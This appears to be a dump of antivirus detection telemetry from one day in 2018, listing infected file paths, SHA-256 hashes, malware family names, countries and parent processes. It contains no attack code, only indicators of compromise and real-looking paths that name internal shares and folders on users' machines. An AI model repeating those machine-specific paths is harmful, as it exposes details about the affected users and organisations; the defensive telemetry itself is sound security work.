  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T23:42:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6306390\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091835-ee8d8f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091810-EA1CF699\\AVSCAN-20181101-091835-EE8D8F2C', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-230013-bc2cf258', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_641529ab\\AVSCAN-20181101-225035-6DA160CC\\AVSCAN-20181101-230013-BC2CF258', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='05ad332369e650c75a819985cdb687fa151e30a7c1487581a6e5988bc674562b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:01:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh5325.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH5325.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:37:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:49:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:43:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='E:\\autorun.inf\\autorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='makan outtrip.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GAVANS INDONESIA_\\UPAH\\UANG MAKAN OUTTRIP\\MAKAN OUTTRIP.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kelembagaan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\hari 2 (Kuradis)\\2. KELEMBAGAAN\\KELEMBAGAAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172339-dcee1944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172339-DCEE1944', filesize=64000, name='W97M/Agent.8759332.#M1.#R1'), hash='3d7c83e4bfd3c9b1c7ddf83c90b210e4259c466522bda4bf95212908aabc3b7b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:23:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:45:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125019-3911887f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124957-25BEA3A1\\AVSCAN-20181101-125019-3911887F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:50:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121242-b2f8e0d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121209-96CFB82D\\AVSCAN-20181101-121242-B2F8E0D8', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a9fc80398b032446de9efa88eb748c3278349610abd9164ecc13d5bf9ba42d6', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111352-108ea4ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111352-108EA4BA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dforrt.dll', filepath='E:\\MATLAB7\\bin\\win32\\DFORRT.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='ca53261b76c180eafb9e0c3c966d5959a972e82281218693bb3f43b6a8ccfb25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Tencent\\TGuard\\TGuard.exe', parentsize=1274560, timestamp='2018-11-01T04:01:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsn7458.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:36:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215856-4c08f9ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215856-4C08F9EC', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='poweriso 6.6 and serial key.exe', filepath='C:\\Users\\X\\Desktop\\nera\\# (installer prog. base)\\# (creare file iso)\\PowerISO\\PowerISO 6.6 and Serial Key\\PowerISO 6.6 and Serial Key.exe', filesize=6144000, name='HEUR/AGEN.1011383.#M1.#R1'), hash='e06e83b21a0aab3d0107dd1bc2fe903113726aa2a0277e66e300374a30008706', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:04:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rmactivate.exe', filepath='D:\\Backups\\Contmac\\drive\\Fiscal_Contmac\\OUTROS\\SysWOW64\\RMActivate.exe', filesize=576000, name='W32/Stanit.#M1.#R1'), hash='b8afcfdd7095e8d894c8c1ab0508adb7b70604e8b6f0b342ca6a4049df25c5e5', metadata=Row(cmdline='\\\\\\\\\\\\\\\\CONTPARTNER-BKP\\\\\\\\BKP_Completo\\\\\\\\ D:\\\\\\\\Backups\\\\\\\\ \\\\\\/MIR \\\\\\/R:2 \\\\\\/W:2', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Robocopy.exe', parentsize=98816, timestamp='2018-11-01T16:32:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190802-0ee89937', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190802-0EE89937', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gplot.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\gplot.exe', filesize=384000, name='W32/Ramnit.CD.#M1.#R1'), hash='c401e13e7cadebbb2643eee40e9265fda2d2dc576841233596966f26a6f24ec4', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:02:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13094\\drp\\FORCED\\NTx86\\7040\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='9350a0fc0253262229e6cc2cfbea6affb4c36f783b49a92245054c11d7a305c8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:09:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172831-e015c5b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172831-E015C5B4', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='c89191aaa50f54417f9c8b348b859e9751cf0111ede5a3a84640a60937d83296', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:28:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:55:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154249-d0d73a24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ab624a1\\AVSCAN-20181101-154109-C2FAC793\\AVSCAN-20181101-154249-D0D73A24', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='bb671a85c05eae3ff8f1f9960d0ab0737007be78aabaab445c57de9012be9ef4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:42:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adventureinlay.exe', filepath='\\?\\J:\\العاب2\\جميع انواع الزوما\\زوما\\AdventureInlay.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='6d8f0d34b4aba333425dfaba2073b27cc86dd4241efd4ac5cc7c9146dfab3f7f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5487c98b79e9f77bf6e6b888928da0d0051b2b9b6e581906705025417ecb86d5.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\5487C98B79E9F77BF6E6B888928DA0D0051B2B9B6E581906705025417ECB86D5.VIR', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='5487c98b79e9f77bf6e6b888928da0d0051b2b9b6e581906705025417ecb86d5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:12:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartprintsetup.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\nightly.0\\Software\\OLD\\Drivers\\Printers\\HP 7500A\\OJ7500_E910\\Toolbar\\smartprintsetup.exe', filesize=964000, name='W32/Sality.Y.#M1.#R1'), hash='69045197271e1e1ecf56b9ce5725b995543eba63e5282c7023d9c1eb9f6332e5', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T08:24:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9E4E80B760D990D08C455A290A87FBE4D014A3E58547F1300B702324232FD21A', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T07:38:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200843-a93b4c67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9c38102\\AVSCAN-20181101-195049-34D32B5C\\AVSCAN-20181101-200843-A93B4C67', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='39c7df668fd397c575fc275a651708de48778992c98058c4c6bd836da0bb86f9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:08:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002405-42d99dd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002405-42D99DD8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053413-23b67ba4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053413-23B67BA4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T15:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='administrator.exe', filepath='F:\\New folder\\Corel Draw 12\\Brazilian Portuguese\\Administrator\\Administrator.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131120-0a1ff2e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aacd22b7\\AVSCAN-20181101-130853-EFC7726D\\AVSCAN-20181101-131120-0A1FF2E6', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:12:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090835-1b74cf25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224746-B47ADADF\\AVSCAN-20181102-090835-1B74CF25', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\New folder\\New folder (2)\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\New folder\\New folder (2)\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:31:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6d27c9d6004d37d642390a5c566dd55e797e3870', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\6d27c9d6004d37d642390a5c566dd55e797e3870', filesize=2048000, name='W32/Virut.Gen.#M1.#R1'), hash='1e3915cc30cce5fb9a83b14af52b2b973200781389451a9983d06ff8eebd8e7e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:15:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-035729-308b7d51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5de6c7eb\\AVSCAN-20181101-035539-196EC8EF\\AVSCAN-20181101-035729-308B7D51', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:28Z'), dt=datetime.date(2018, 11, 1)),
